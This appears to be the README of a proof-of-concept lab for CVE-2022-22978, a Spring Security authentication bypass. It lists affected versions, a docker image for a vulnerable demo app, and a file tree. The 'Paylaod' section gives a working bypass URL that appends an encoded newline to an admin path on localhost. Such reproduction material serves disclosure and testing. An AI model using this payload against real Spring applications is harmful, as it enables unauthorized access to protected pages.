CVE-2022-22978 Spring-Security bypass Demo### CVE-2022-22978 Spring-Security bypass Demo
>在Spring Security中使用RegexRequestMatcher且规则中包含带点号的正则表达式时,攻击者可以通过构造恶意数据包绕过身份认证
### 影响范围
>Spring Security 5.5.x < 5.5.7
Spring Security 5.6.x < 5.6.4
### 复现


### Paylaod
>http://localhost:8080/admin/index%0a
### Docker
> docker pull s0cke3t/cve-2022-22978:latest
[4.0K] /data/pocs/b036003b1a3bf7b58dfd3b7d8896bcd2539f8c4f
├── [ 146] Dockerfile
├── [ 40K] img_1.png
├── [ 41K] img.png
├── [ 10K] mvnw
├── [6.6K] mvnw.cmd
├── [2.5K] pom.xml
├── [ 451] README.md
└── [4.0K] src
├── [4.0K] main
│ ├── [4.0K] java
│ │ └── [4.0K] cc
│ │ └── [4.0K] saferoad
│ │ ├── [4.0K] config
│ │ │ └── [ 654] SpringSecurityConfig.java
│ │ ├── [4.0K] controller
│ │ │ └── [ 491] Demo.java
│ │ └── [4.0K] cve202222978
│ │ ├── [ 377] Cve202222978Application.java
│ │ └── [ 543] ServletInitializer.java
│ └── [4.0K] resources
│ ├── [ 1] application.properties
│ └── [4.0K] templates
│ ├── [ 305] index.html
│ └── [ 152] manage.html
└── [4.0K] test
└── [4.0K] java
└── [4.0K] cc
└── [4.0K] saferoad
└── [4.0K] cve202222978
├── [ 231] Cve202222978ApplicationTests.java
└── [ 623] RegexRequestMatcherTests.java
15 directories, 16 files